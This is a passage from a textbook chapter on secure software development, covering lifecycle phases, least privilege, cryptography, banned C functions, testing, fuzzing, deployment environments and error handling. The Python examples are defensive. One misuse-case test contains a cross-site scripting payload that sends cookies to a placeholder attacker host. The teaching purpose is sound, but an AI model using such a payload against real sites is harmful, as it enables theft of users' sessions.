Secure Software Development

Software engineering is the systematic development of software to fulfill a variety of needs, such as business, recreational, scientific, and educational functions, to name just a few of the many areas where software is useful. Regardless of the type of software, there is a universal requirement that software applications work properly, perform the desired functions, and perform them correctly. The functionality of software ranges from spreadsheets that accurately add figures to pacemakers that stimulate the heart. Developers know that functional specifications must be met for the software to be satisfactory. Software engineering, then, is largely the work of fitting as many requirements as possible into the project schedule. But with analysts and developers working overtime to get as many functional elements correct as possible, nonfunctional requirements often get pushed to the back burner or neglected entirely.

Security has been described as a nonfunctional requirement. This places it into a category of secondary importance for many developers. Their view is that if timelines, schedules, and budgets are all in the green, then maybe there will be time to devote to security programming.

The Software Engineering Process

Software does not build itself. This is good news for software designers, analysts, programmers, and the like, because the complexity of designing and building software enables them to engage in well-paying careers. To achieve continued success in this difficult work environment, software engineering processes have been developed. Rather than just sitting down and starting to write code at the onset of a project, software engineers use a complete development process. There are several major categories of software engineering processes. The waterfall model, the spiral model, and the evolutionary model are major examples. Within each of these major categories are numerous variations, and each group then personalizes the process to its project requirements and team capabilities.

This chapter contains many details of how to test for exploitable vulnerabilities in software. Do not perform or attempt these steps outside of systems for which you either are the owner or have explicit permission from the owner. Otherwise, you may find yourself being accused of hacking and possibly even facing legal charges.

Traditionally, security is an add-on item that is incorporated into a system after the functional requirements have been met. It is not an integral part of the software development lifecycle process. This places it at odds with both functional and lifecycle process requirements. The resolution to all of these issues is relatively simple: incorporate security into the process model and build it into the product along with each functional requirement. The challenge is in how to accomplish this goal. There are two separate and required elements needed to achieve this objective: first, the inclusion of security requirements and measures in the specific process model being used, and, second, the use of secure coding methods to prevent opportunities to introduce security failures into the software’s design.

Process Models

There are several major software engineering process models, each with slightly different steps and sequences, yet they all have many similar items. The waterfall model is characterized by a multistep process in which steps follow each other in a linear, one-way fashion, like water in a waterfall. The spiral model has steps in phases that execute in a spiral fashion, repeating at different levels with each revolution of the model. The agile model is characterized by iterative development, where requirements and solutions evolve through an ongoing collaboration between self-organizing cross-functional teams. The evolutionary model is an iterative model designed to enable the construction of increasingly complex versions of a project. There are numerous other models and derivations in use today. The details of these process models are outside the scope of this book, and most of the detail is not significantly relevant to the issue of security. From a secure coding perspective, a secure development lifecycle (SDL) model is essential to success. From requirements to system architecture to coding to testing, security is an embedded property in all aspects of the process. There are several specific items of significance with respect to security. Four primary items of interest, regardless of the particular model or methodology employed in software creation, are the requirements, design, coding, and testing phases. These (and other) phases are described in the following section.

Secure Development Lifecycle

There may be as many different software engineering methods as there are software engineering groups, but an analysis of these methods indicates that most share common elements from which an understanding of a universal methodology can be obtained. For decades, secure coding—that is, creating code that does what it is supposed to do and only what it is supposed to do—has not been high on the radar for most organizations. The past decade of explosive connectivity and the rise of malware and hackers have increased awareness of this issue significantly. A recent alliance of several major software firms concerned with secure coding principles revealed several interesting patterns. First, they were all attacking the problem using different methodologies yet in surprisingly similar fashions. Second, they found a series of principles that appears to be related to success in this endeavor.

First, all of the firms recognized the need to include secure coding principles in the development process. Microsoft has been very open and vocal about its SDL implementation and has published significant volumes of information on its genesis and evolution (https://www.microsoft.com/en-us/sdl/default.aspx).

The Software Assurance Forum for Excellence in Code (SAFECode) is an organization formed by some of the leading software development firms with the objective of advancing software assurance through better development methods. SAFECode (www.safecode.org) members include EMC, Microsoft, and Intel. An examination of SAFECode members’ processes reveals an assertion that secure coding must be treated as an issue that exists throughout the development process and cannot be effectively treated at a few checkpoints with checklists. Regardless of the software development process used, the first step down the path to secure coding is to infuse the process with secure coding principles.

Threat Modeling and Attack Surface Area Minimization



Two important tools have come from the secure coding revolution: attack surface area minimization and threat modeling.

Attack surface area minimization is a strategy to reduce the places where code can be attacked. Threat modeling is the process of analyzing threats and their potential effects on software in a finely detailed fashion. The output of the threat model process is a compilation of threats and how they interact with the software. This information is communicated across the design and coding team so that potential weaknesses can be mitigated before the software is released.
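Attack surface minimization often comes down to safe defaults. As a minimal sketch in Python (the function name and the `expose_publicly` flag are hypothetical), a service can listen only on the loopback interface unless broader network exposure is explicitly requested, so that an interface nobody asked to expose is not reachable from other machines:

```python
import socket

def open_listener(port: int = 0, expose_publicly: bool = False) -> socket.socket:
    """Open a TCP listener with the smallest reasonable network exposure.

    By default the socket is bound to the loopback interface only, so it
    cannot be reached from other hosts. Listening on all interfaces must be
    requested explicitly through the (hypothetical) expose_publicly flag.
    Port 0 asks the operating system to pick any free port.
    """
    host = "0.0.0.0" if expose_publicly else "127.0.0.1"
    return socket.create_server((host, port))

listener = open_listener()
print(listener.getsockname())  # prints ('127.0.0.1', <a free port chosen by the OS>)
listener.close()
```

Each feature that is reachable only when someone deliberately turns it on is one less place an attacker can probe by default.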

Requirements Phase

The requirements phase should define the specific security requirements if there is any expectation of them being designed into the project. Regardless of the methodology employed, the process is all about completing the requirements. Secure coding does not refer to adding security functionality into a piece of software. Security functionality is a standalone requirement. The objective of the secure coding process is to properly implement this and all other requirements so that the resultant software performs as desired and only as desired.

The requirements process is a key component of security in software development. Security-related items enumerated during the requirements process are visible throughout the rest of the software development process. They can be architected into the systems and subsystems, addressed during coding, and tested. For the subsequent steps to be effective, the security requirements need to be both specific and positive. Requirements such as “make secure code” or “no insecure code” are nonspecific and not helpful in the overall process. Specific requirements such as “prevent unhandled buffer overflows and unhandled input exceptions” can be specifically coded for in each piece of code.
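A specific requirement such as “prevent unhandled input exceptions” translates directly into code. The following Python sketch assumes a hypothetical order-quantity field, a 10-character input bound, and a limit of 1,000 units; the point is that every malformed input is rejected through one controlled path rather than surfacing as an unexpected exception:

```python
import re

MAX_QUANTITY = 1000      # hypothetical limit taken from the requirements document
MAX_FIELD_LENGTH = 10    # hypothetical bound on the size of the raw input

def parse_quantity(raw: str) -> int:
    """Convert untrusted text to an order quantity, rejecting bad input explicitly.

    Every failure path raises ValueError with a controlled message, so callers
    never see an unhandled exception caused by malformed input.
    """
    if len(raw) > MAX_FIELD_LENGTH:           # bound the input before doing any work
        raise ValueError("quantity field too long")
    text = raw.strip()
    if not re.fullmatch(r"[0-9]+", text):     # ASCII digits only: no signs or exponents
        raise ValueError("quantity must be a whole number")
    value = int(text)
    if not 1 <= value <= MAX_QUANTITY:        # enforce the range stated in the requirement
        raise ValueError(f"quantity must be between 1 and {MAX_QUANTITY}")
    return value
```

A caller can catch ValueError in one place and report a clean validation error, and testers get a concrete, checkable behavior for each class of bad input.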

Tech Tip

Common Secure Coding Requirements

Common secure coding requirements include the following:

- Analysis of security and privacy risk
- Authentication and password management
- Audit logging and analysis
- Authorization and role management
- Code integrity and validation testing
- Cryptography and key management
- Data validation and sanitization
- Network and data security
- Ongoing education and awareness
- Team staffing requirements
- Third-party component analysis

During the requirements activity, it is essential that the project/program manager and any business leaders who set schedules and allocate resources understand the need for a secure development process and what it requires. The cost of adding security at a later time rises exponentially, with the most expensive form being the common release-and-patch process used by many firms. The development of both functional and nonfunctional security requirements occurs in tandem with other requirements through the development of use cases, analysis of customer inputs, implementation of company policies, and compliance with industry best practices. Depending on the nature of a particular module, special attention may be focused on sensitive issues such as personally identifiable information (PII), sensitive data, and intellectual property data.

One of the outputs of the requirements phase is a security document that helps guide the remaining aspects of the development process, ensuring that secure code requirements are being addressed. These requirements can be infused into design, coding, and testing, thus ensuring they are addressed throughout the development process.

Design Phase

Coding without designing first is like building a house without using plans. This might work fine on small projects, but as the scope grows, so do complexity and the opportunity for failure. Designing a software project is a multifaceted process. Just as there are many ways to build a house, there are many ways to build a program. Design is a process involving trade-offs and choices, and the criteria used during the design decisions can have lasting impacts on program construction. Two major secure coding principles can be applied during the design phase that can have a large influence on the code quality. The first of these is the concept of minimizing the attack surface area. Reducing the avenues of attack available to a hacker can have obvious benefits. Minimizing the attack surface area is a concept that tends to run counter to the way software has been designed—most designs come as a result of incremental accumulation, adding features and functions without regard to maintainability. The second is to perform a risk analysis of the design to include threats and mitigations.

Coding Phase

The point at which the design is implemented is the coding step in the software development process. The act of instantiating an idea into code is a point where an error can enter the process. These errors are of two types: the failure to include desired functionality and the inclusion of undesired behavior in the code. Testing for the first type of error is relatively easy if the requirements are enumerated in a previous phase of the process.

Testing for the inclusion of undesired behavior is significantly more difficult. Testing for an unknown is a virtually impossible task. What makes this possible at all is the concept of testing for categories of previously determined errors. Several classes of common errors have been observed. Enumerations of known software weaknesses and vulnerabilities have been compiled and published as Common Weakness Enumeration (CWE) and Common Vulnerabilities and Exposures (CVE) by the MITRE Corporation, a government-funded research group (www.mitre.org). These enumerations have enabled significant advancement in the development of methods to reduce code vulnerabilities. Both CVE and CWE are vendor- and language-neutral methods of describing errors. These enumerations allow a common vocabulary for communication about weaknesses and vulnerabilities. This common vocabulary has also led to the development of automated tools to manage the tracking of these issues.

There are many common coding errors, but some of the primary and most damaging are least privilege violations and cryptographic failures. Language-specific failures are another common source of vulnerabilities.

There are several ways to search for coding errors that lead to vulnerabilities in software. One method is manual code inspection. Developers can also be trained to “not make mistakes,” but this approach has not proven successful. This has led to the development of a class of tools designed to analyze code for potential defects.

Static code-analysis tools can be used to analyze software for coding errors that can lead to known types of vulnerabilities and weaknesses. Sophisticated static code analyzers can examine codebases to find function calls of unsafe libraries, potential buffer-overflow conditions, and numerous other conditions. Currently, CWE describes more than 750 different weaknesses—far too many for developer memory and direct knowledge. In light of this and because some weaknesses are more prevalent than others, MITRE has collaborated with SANS to develop the CWE/SANS Top 25 Most Dangerous Software Errors list. One of the ideas behind the Top 25 list is that it can be updated periodically as the threat landscape changes. Explore the current listing at http://cwe.mitre.org/top25/.

The two main enumerations of common software errors are the Top 25 list maintained by MITRE and the Open Web Application Security Project (OWASP) Top Ten list for web applications. Depending on the type of application being evaluated, these lists provide a solid starting point for security analysis of known error types. MITRE is the repository of the industry-standard list for standard programs, and OWASP is for web applications. As the causes of common errors do not change quickly, these lists are not updated every year.

Least Privilege One of the central paradigms of security is the notion of running a process with the least required privilege. Least privilege requires that the developer understand what privileges are needed specifically for an application to execute and access all its necessary resources. Obviously, from a developer’s point of view, it would be easier to use administrative-level permission for all tasks, which removes access controls from the equation, but this also removes the very protections that access-level controls are designed to provide. The other end of the spectrum is software designed for operating systems without any built-in security, such as early versions of Windows and some mainframe OSs, where security comes in the form of an application package. When these applications are migrated to platforms that enforce access controls, permissions become an issue.

As developers increasingly are tasked with incorporating security into their work, the natural tendency is to code around this “new” security requirement, developing in the same fashion as before, as if security is not an issue. This is commonly manifested as a program that runs only under an administrative-level account or runs as a service utilizing the SYSTEM account for permissions in Windows. Both of these are bad practices that reduce security, introduce hard-to-fix errors, and produce code that is harder to maintain and extend.

Developers who do development and testing on an integrated environment on their own PC—that is, they have a web server and/or database engine on their PC—can produce code that works fine on their machine, where unified account permissions exist (and where they are frequently the administrator). When this code is transitioned to a distributed environment, permissions can become an issue. The proper method is to manage permissions appropriately on the developer box from the beginning.

The key principle in designing and coding software with respect to access-level controls is to plan and understand the nature of the software’s interaction with the operating system and system resources. Whenever the software accesses a file, a system component, or another program, the issue of appropriate access control needs to be addressed. And although the simple practice of just giving everything root or administrative access may solve the immediate problem, it creates much bigger security issues that will be much less apparent until later. One example is a program that runs correctly when initiated from an administrator account but fails when run under normal user privileges. The actual failure may stem from a privilege issue, but the point of failure in the code may be many procedures away, and diagnosing these types of failures is a difficult and time-consuming operation.

When software fails because of an exploited vulnerability, the hacker typically achieves whatever level of privilege that the application had prior to the exploit occurrence. If an application always operates with root-level privilege, this will be passed on to the hacker as well.

The bottom line is actually simple: Determine what needs to be accessed and what the appropriate level of permission is, and then use that level in design and implementation. Repeat this for every item accessed. In the end, few functions actually require administrative access. Once the application is designed, the whole process will need to be repeated for the installation procedure, because installing software frequently requires a higher level of access than executing it. Design and implementation details must be based on the required permission levels, not on a higher level such as administrative root access chosen for convenience.
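When some privileged setup is unavoidable (for example, reading a root-owned configuration file or binding to a port below 1024), a common way to apply least privilege is to do that work first and then permanently switch to an unprivileged account. The Python sketch below uses the POSIX calls in the standard os module; the target account (UID/GID 65534, often the nobody account on Linux) is an assumption, and the function is a minimal illustration rather than a complete service setup:

```python
import os

def drop_privileges(uid: int, gid: int) -> bool:
    """Permanently give up root privileges once privileged setup is finished.

    Returns True if privileges were dropped, or False if the process was not
    running as root in the first place (nothing to drop). POSIX only.
    """
    if os.geteuid() != 0:
        return False
    os.setgroups([])   # clear supplementary groups while we still have root
    os.setgid(gid)     # change the group first; after setuid() this would fail
    os.setuid(uid)     # as root, this sets real, effective, and saved UIDs
    return True
```

The order matters: supplementary groups and the group ID must be changed while the process still has root privileges, because once setuid() succeeds it no longer has permission to change them. If an attacker later exploits the process, the exploit inherits only the unprivileged account.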

The cost of failing to heed the principle of least privilege is twofold. First, you have expensive, time-consuming access-violation errors that are hard to track down and correct. Second, you face a problem when an exploit is found that allows some other program to use portions of your code in an unauthorized fashion. A prime example is the sendmail exploit in the UNIX environment. Because sendmail requires root-level access for some functions, an exploit that inserts foreign code into the sendmail process stream gets that code executed with the root-level access of the sendmail process itself. In this case, sendmail genuinely needs root-level access, but the exploit illustrates that the risk is real and that a vulnerability will be exploited once found. Proper design can, in many cases, eliminate the need for such high privilege levels.

Cryptographic Failures Hailed as a solution for all problems, cryptography has as much chance of being the ultimate cure-all as did the tonics sold by traveling salesmen of a different era. There is no such thing as a universal solution, yet there are some versatile tools that provide a wide range of protections. Cryptography falls into this “useful tool” category. Proper use of cryptography can provide a wealth of programmatic functionality—from authentication and confidentiality to integrity and nonrepudiation. These are valuable tools, and many programs rely on proper cryptographic implementation for important functionality. The need for this functionality in an application tempts programmers to roll their own cryptographic functions. This is a task fraught with opportunity for catastrophic error.

Cryptographic errors come from several common causes. One typical mistake is choosing to develop your own cryptographic algorithm. Developing a secure cryptographic algorithm is far from an easy task, and even when done by experts, weaknesses can occur that make the algorithms unusable. Cryptographic algorithms become trusted after years of scrutiny and attacks, and any new algorithms would take years to join the trusted set. If you instead decide to rest on secrecy, be warned that secret or proprietary algorithms have never provided the desired level of protection. One of the axioms of cryptography is that there is no security through obscurity.

Tech Tip

Use Only Approved Cryptographic Functions

Always use vetted and approved libraries for all cryptographic work. Never create your own cryptographic functions, even when using known algorithms. For example, the .NET Framework has a number of cryptography classes that developers can call upon to perform encryption services.
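The same principle holds outside .NET. As an illustration in Python, the standard library’s hmac and hashlib modules provide a vetted message authentication code, so a program that needs integrity protection does not have to invent its own keyed hash. The function names sign and verify are hypothetical wrappers:

```python
import hashlib
import hmac
import secrets

def sign(key: bytes, message: bytes) -> bytes:
    """Compute an HMAC-SHA256 tag using the standard library, not a homemade MAC."""
    return hmac.new(key, message, hashlib.sha256).digest()

def verify(key: bytes, message: bytes, tag: bytes) -> bool:
    """Compare tags in constant time so timing does not reveal how many bytes matched."""
    return hmac.compare_digest(sign(key, message), tag)

key = secrets.token_bytes(32)   # 256-bit key from the operating system's CSPRNG
tag = sign(key, b"transfer $100 to account 42")
print(verify(key, b"transfer $100 to account 42", tag))   # True
print(verify(key, b"transfer $900 to account 42", tag))   # False
```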

Deciding to use a trusted algorithm is a proper start, but several major errors can still occur. The first is an error in implementing the algorithm. An easy way to avoid this type of error is to use a library function that has already been properly tested. Sources of such library functions abound, and they provide an economical way to meet this need. Once you have an algorithm and have chosen a particular implementation, the next item needed is a random number from which to generate a random key. Cryptographic functions use an algorithm and a key, the latter being a number.

The generation of a real random number is not a trivial task. Computers are machines renowned for reproducing the same output when given the same input, so generating a pure, nonreproducible random number is a challenge. Functions for producing random numbers are built into the libraries of most programming languages, but these are pseudorandom number generators: although the distribution of output numbers appears random, they generate a reproducible sequence. Given the same input (seed), a second run of the function will produce the same sequence of “random” numbers. Attackers have more than once bypassed security by determining the seed, reproducing the random sequence, and using this knowledge to “break” a cryptographic function. This method was used to subvert an early version of Netscape’s SSL implementation. Using a number that is cryptographically random, and therefore suitable for an encryption function, resolves this problem. Again, the use of trusted library functions designed and tested for generating such numbers is the proper methodology.
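The difference between a general-purpose pseudorandom generator and a cryptographically secure source is easy to demonstrate. In Python, the random module is a seeded Mersenne Twister intended for simulation and testing, while the secrets module draws from the operating system’s cryptographically secure generator. The seed value 1234 below is arbitrary:

```python
import random
import secrets

# A general-purpose PRNG is deterministic: the same seed always yields the
# same "random" sequence, so a key derived from it can be reproduced by
# anyone who learns or guesses the seed.
gen_a = random.Random(1234)
gen_b = random.Random(1234)
key_a = bytes(gen_a.getrandbits(8) for _ in range(16))
key_b = bytes(gen_b.getrandbits(8) for _ in range(16))
print(key_a == key_b)   # True: the "secret" key was regenerated from the seed

# The secrets module takes no seed and uses the OS CSPRNG, so its output
# cannot be replayed this way.
key = secrets.token_bytes(16)   # 128-bit key suitable for cryptographic use
print(len(key))                 # 16
```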

Never hard-code secret keys into codebases. Hackers can use disassemblers and various code differential tools to dissect your code and find static information.

Now you have a good algorithm and a good random number, so where can you go wrong? Storing private keys in areas where they can be recovered by an unauthorized person is the next worry. Poor key management has failed many a cryptographic implementation. A famous example of extracting cryptographic keys from an executable and using them to break a cryptographic scheme is the case of the hackers who broke DVD encryption this way and developed the DeCSS program. Tools have been developed that can search code for “random” keys and extract the key from the code or running process. The bottom line is simple: do not hard-code secret keys in your code. They can, and will, be discovered. Keys should be generated and then passed by reference, minimizing the number of copies that travel across a network or through an application. Storing them in memory in a noncontiguous fashion is also important to prevent external detection. Again, trusted cryptographic library functions come to the rescue.
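One simple way to keep keys out of the codebase is to supply them at deployment time. The Python sketch below assumes a hypothetical environment variable named APP_ENCRYPTION_KEY holding a hex-encoded 256-bit key; in larger deployments a dedicated secrets manager or hardware security module usually plays this role. The important properties are that the program contains no key for a disassembler to find and that a missing key is treated as an error, never as a reason to fall back to a built-in default:

```python
import os

KEY_ENV_VAR = "APP_ENCRYPTION_KEY"   # hypothetical name set by the deployment process

def load_key(env_var: str = KEY_ENV_VAR, expected_len: int = 32) -> bytes:
    """Load a hex-encoded secret key from the environment instead of the source code."""
    encoded = os.environ.get(env_var)
    if encoded is None:
        # Fail closed: there is deliberately no hard-coded fallback key.
        raise RuntimeError(f"{env_var} is not set")
    try:
        key = bytes.fromhex(encoded)
    except ValueError:
        raise RuntimeError(f"{env_var} is not valid hex") from None
    if len(key) != expected_len:
        raise RuntimeError(f"{env_var} must decode to {expected_len} bytes")
    return key
```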

You might have deduced by this point that the term library function has become a common theme in this section. This is not an accident. In fact, this is probably one of the best pieces of advice from this chapter: use commercially proven functions for cryptographic functionality.

Language-Specific Failures Modern programming languages are built around libraries that permit reuse and that speed up the development process. The development of many library calls and functions was done without regard to secure coding implications, and this has led to issues related to specific library functions. As will be shown later in the chapter, strcpy() has had its fair share of involvement in buffer overflows and should be avoided. Developing and maintaining a series of deprecated functions and prohibiting their use in new code, while removing them from old code when possible, is a proven path toward more secure code.

Tech Tip

Deprecated C Functions

Microsoft recommends that the following function families be deprecated/removed:

- strcpy() and strncpy()
- strcat() and strncat()
- scanf()
- sprintf()
- gets()
- memcpy(), CopyMemory(), and RtlCopyMemory()

Banned functions are easily handled via automated code reviews during the check-in process. The challenge is in building developer awareness of their potential dangers and of the value of safer coding practices.
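An automated check of this kind can be quite small. The following Python sketch (find_banned_calls and check_files are hypothetical names) scans C source text for calls to the function families listed above and reports each hit with its line number. Matching a name followed by an opening parenthesis is a deliberate simplification; production tools parse the code, which also avoids false positives inside comments and string literals:

```python
import re
from typing import Iterable, List, Tuple

# Banned function families from the Tech Tip; a name followed by "(" counts as a call.
BANNED = ["strcpy", "strncpy", "strcat", "strncat", "scanf", "sprintf",
          "gets", "memcpy", "CopyMemory", "RtlCopyMemory"]
# \b keeps safer relatives such as fgets() and snprintf() from matching.
BANNED_CALL = re.compile(r"\b(" + "|".join(BANNED) + r")\s*\(")

def find_banned_calls(source: str) -> List[Tuple[int, str]]:
    """Return (line number, function name) for each banned call in C source text."""
    hits = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        for match in BANNED_CALL.finditer(line):
            hits.append((lineno, match.group(1)))
    return hits

def check_files(paths: Iterable[str]) -> int:
    """Print every violation and return 1 if any file contains one, else 0."""
    status = 0
    for path in paths:
        with open(path, encoding="utf-8", errors="replace") as f:
            for lineno, name in find_banned_calls(f.read()):
                print(f"{path}:{lineno}: banned function {name}()")
                status = 1
    return status
```

A check-in hook could call `sys.exit(check_files(changed_paths))`, where changed_paths is a hypothetical list of the files in the commit, and reject the commit whenever the exit status is nonzero.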

Testing Phase

If the requirements phase marks the beginning of the generation of security in code, then the testing phase marks the other boundary. Although there are additional functions after testing, no one wants a user to validate errors in code. Errors discovered after the code has shipped are the most expensive to fix, regardless of the severity. Employing use cases that feed known inputs to the program and compare its output to the desired output is a proven method of testing software. The use cases that test specific functional requirements are designed from the requirements determined in the requirements phase. Providing additional security-related use cases is the process-driven way of ensuring that security specifics are also tested.

The testing phase is the last opportunity to determine that the software performs properly before the end user experiences problems. Errors found in testing are late in the development process, but at least they are still learned about internally, before the end customer suffers. Testing can occur at each level of development: module, subsystem, system, and completed application. The sooner errors are discovered and corrected, the lower the cost and the lesser the impact will be to project schedules. This makes testing an essential step in the process of developing good programs.

Testing for security requires a much broader series of tests than functional testing does. Misuse cases can be formulated to verify that vulnerabilities cannot be exploited. Fuzz testing (also known as fuzzing) uses random inputs to check for exploitable buffer overflows. Code reviews by design and development teams are used to verify that security elements such as input and output validation are functional because these are the best defenses against a wide range of attacks, including cross-site scripting and cross-site request forgeries. Code walkthroughs begin with design reviews, architecture examinations, unit testing, subsystem testing, and, ultimately, complete system testing.
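Misuse cases can be written as ordinary automated tests. This Python sketch (render_comment is a hypothetical helper) encodes user-supplied text with the standard library’s html.escape before placing it in a page and then checks the misuse case in which an attacker submits a script instead of a comment. Note that html.escape covers HTML element content and quoted attribute values only; text placed into JavaScript or URLs needs encoding appropriate to that context:

```python
import html

def render_comment(comment: str) -> str:
    """Build an HTML fragment, encoding user text so it is displayed, not executed."""
    return '<p class="comment">' + html.escape(comment, quote=True) + "</p>"

# Misuse case: an attacker submits a script instead of a comment.
attack = '<script>document.location="http://evil.example/?c="+document.cookie</script>'
output = render_comment(attack)
assert "<script>" not in output   # the tag was neutralized by output encoding
print(output)
```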

Testing includes white-box testing, where the test team has access to the design and coding elements; black-box testing, where the team does not have access; and gray-box testing, where the test team has more information than in black-box testing but not as much as in white-box testing. These modes of testing are used for different objectives; for example, fuzz testing works perfectly fine regardless of the type of testing, whereas certain types of penetration tests are better in a white-box testing environment. Testing is also performed on the production code to verify that error handling and exception reporting, which may provide detailed diagnostic information during development, are squelched to prevent information release during error conditions.

Final code can be subjected to penetration tests, designed specifically to test configuration, security controls, and common defenses such as input and output validation and error handling. Penetration testing can explore the functionality and whether specific security controls can be bypassed. Using the attack surface analysis information, penetration testers can emulate adversaries and attempt a wide range of known attack vectors to verify that the known methods of attack are all mitigated.

One of the most powerful tools that can be used in testing is fuzzing, the systematic application of a series of malformed inputs to test how the program responds.
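A basic fuzzer needs only a source of malformed inputs and a way to recognize failures. The Python sketch below targets a hypothetical length-prefixed record parser. Because Python checks bounds, fuzzing here finds unhandled exceptions rather than memory corruption, but the structure is the same one used against C code. Unlike key generation, fuzzing benefits from a seeded, reproducible generator, because a failing input can then be regenerated on demand:

```python
import random

def parse_record(data: bytes) -> bytes:
    """Hypothetical target: one length byte followed by that many payload bytes."""
    if not data:
        raise ValueError("empty record")
    length = data[0]
    payload = data[1:1 + length]
    if len(payload) != length:
        raise ValueError("truncated record")
    return payload

def fuzz(target, iterations: int = 10_000, seed: int = 0) -> list:
    """Feed random malformed inputs to target and collect unexpected failures.

    ValueError is the target's documented way of rejecting bad input, so it is
    expected; any other exception is recorded as a potential bug.
    """
    rng = random.Random(seed)   # fixed seed so any finding can be reproduced
    failures = []
    for _ in range(iterations):
        data = bytes(rng.getrandbits(8) for _ in range(rng.randint(0, 16)))
        try:
            target(data)
        except ValueError:
            pass
        except Exception as exc:   # anything else is a finding
            failures.append((data, exc))
    return failures

print(len(fuzz(parse_record)))   # 0: every malformed input was rejected cleanly
```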

Deployment Phase

Although not considered by many to be part of the software development process, the deployment phase is the release of new changes to production. The ultimate success or failure of the development process is measured in production, so this should not be a dismissed phase. Code should not be released to a production environment until it has passed all the necessary steps required before release. These steps include the necessary program reviews established by the defined process. The development process does not stop here either, because after deployment there is still an ongoing maintenance phase.

Maintenance Phase

The maintenance phase begins when the software moves to production. In a perfect world, there would be no compatibility issues, no bugs, no need to issue patches or fixes, and the only need for new releases would be for new features. But the world isn’t perfect, software certainly isn’t, and errors and vulnerabilities will be discovered. A key element in a secure development process is the triaging and handling of errors when they are found, both during the development process and after release. The primary activity of the maintenance phase is collecting and managing issues associated with software releases. Bugs and vulnerabilities need to be classified, and if they are determined to need immediate fixing, the patch process is managed via this phase.

Environments

Most organizations have multiple, separate computing environments designed to provide isolation between the functions of development, test, staging, and production. The primary purpose of having these separate environments is to prevent security incidents arising from untested code ending up in the production environment. The hardware of these environments is segregated and access control lists are used to prevent users from accessing more than one environment at a time. Moving code between environments requires a special account that can access both, minimizing issues of cross-contamination.

Development

The development environment is sized, configured, and set up for developers to develop applications and systems. Unlike production hardware, the development hardware does not have to be scalable, and it probably does not need to be as responsive for given transactions. The development platform does need to use the same OS type and version as used in the production environment; for example, developing on Windows and deploying to Linux is fraught with difficulties that can be avoided by matching the environments in terms of OS type and version. After code is successfully developed, it is moved to a test system.

Test

The test environment closely mimics the production environment: same versions of software, down to patch levels, same sets of permissions, same file structures, and so forth. The purpose of the test environment is to test a system fully prior to deploying it into production, to find bugs and to ensure that the system will not disrupt the production environment. The test environment may not scale like production, but in terms of its software and hardware footprint, it will look exactly like production. This is important to ensure that system-specific settings are tested in an environment identical to the one in which they will run.

Staging

The staging environment is optional, but it is commonly used when an organization has multiple production environments. After passing testing, the system moves into staging, from where it can be deployed to the different production systems. The primary purpose of staging is to serve as a sandbox after testing, so the test system can test the next set of changes while the current set is deployed across the enterprise. One method of deployment is a staged deployment, where software is deployed to part of the enterprise and then a pause occurs to watch for problems. If none occur, the deployment continues, stage by stage, until all of the production systems are changed. By moving software in this manner, you never lose the old production system until the end of the move, giving you time to monitor and catch any unforeseen problems. This also prevents the total loss of production to a failed update.
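A staged deployment can be sketched as a loop over groups of production systems that halts at the first sign of trouble. This is a minimal Python sketch, not a real deployment tool: `staged_deploy`, the `deploy` and `healthy` callbacks, and the fixed pause are hypothetical stand-ins for an organization's own tooling and monitoring.

```python
import time
from typing import Callable, Sequence


def staged_deploy(
    stages: Sequence[Sequence[str]],
    deploy: Callable[[str], None],   # hypothetical: pushes the new release to one host
    healthy: Callable[[str], bool],  # hypothetical: reports whether a host behaves normally
    pause_seconds: float = 0.0,
) -> list[str]:
    """Deploy stage by stage and stop at the first stage that shows a problem.

    Returns the hosts that received the new release. Hosts in later stages
    keep running the old release, so production is never lost all at once.
    """
    updated: list[str] = []
    for stage in stages:
        for host in stage:
            deploy(host)
            updated.append(host)
        time.sleep(pause_seconds)  # watch period for unforeseen problems
        if not all(healthy(host) for host in stage):
            break  # halt the rollout; the remaining stages are untouched
    return updated
```

With three stages and a failing health check in the second, the third stage never receives the update: the old production systems remain available until the rollout has proven itself.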

Production

The production environment is where the systems work with real data, doing the business that the system is intended to perform. This is an environment where, by design, very few changes occur, and those that do must first be approved and tested via the system’s change management process.

Secure Coding Concepts

Application security begins with code that is secure and free of vulnerabilities. Unfortunately, all code has weaknesses and vulnerabilities, so the desired level of security is maintained by deploying code with effective defenses that prevent those vulnerabilities from being exploited. Proper handling of configurations, errors and exceptions, and inputs can assist in the creation of a secure application. Testing the application throughout the system lifecycle can determine the actual security risk profile of a system.

There are numerous individual elements in the secure development lifecycle that can assist a team in developing secure code. Secure coding practices, such as input validation, proper error and exception handling, and cross-site scripting and cross-site request forgery mitigations, can improve the security of code. Process elements such as security testing, fuzzing, and patch management also help to ensure applications meet a desired risk profile.

Error and Exception Handling

Every application will encounter errors and exceptions that need to be handled in a secure manner. One attack methodology includes forcing errors to move an application from normal operation to exception handling. During an exception, it is common practice to record/report the condition, including supporting information such as the data that resulted in the error. This information can be invaluable in diagnosing the cause of the error condition. The challenge is in where this information is captured. The best method is to capture it in a log file, where it can be secured by an access control list (ACL). The worst case is when it is echoed to the user. Echoing error condition details to users can provide valuable information to attackers when they cause errors on purpose.

All errors and exceptions should be trapped and handled in the generating routine.

Improper exception handling can lead to a wide range of disclosures. Errors associated with Structured Query Language (SQL) statements can disclose data structures and data elements. Remote procedure call (RPC) errors can give up sensitive information such as filenames, paths, and server names. Programmatic errors can give up line numbers that an exception occurred on, the method that was invoked, and information such as stack elements.
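The split between what goes to the log and what goes to the user can be sketched in Python as follows. The routine `lookup_account`, its error text, and the logger name are hypothetical. The point is that diagnostic detail is written only to the log, while the user receives a generic message and a reference number that support staff can match against the log.

```python
import logging
import uuid

# In a real deployment, attach a handler that writes to an ACL-protected log file.
log = logging.getLogger("app.errors")


def lookup_account(account_id: str) -> dict:
    """Hypothetical data-access routine whose error text reveals internal details."""
    raise KeyError(f"no row in table accounts for id={account_id!r}")


def handle_request(account_id: str) -> str:
    try:
        account = lookup_account(account_id)
        return f"Balance: {account['balance']}"
    except Exception:
        incident = uuid.uuid4().hex[:8]
        # Exception text and stack trace are recorded only in the log.
        log.exception("account lookup failed (incident %s, input %r)", incident, account_id)
        # The user learns nothing about tables, paths, or line numbers.
        return f"An internal error occurred. Reference: {incident}"
```

Without configuration, Python's logging module falls back to printing warnings and errors on standard error; a deployment would instead configure a file handler, for example with `logging.basicConfig(filename=..., level=logging.ERROR)`.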

Input and Output Validation

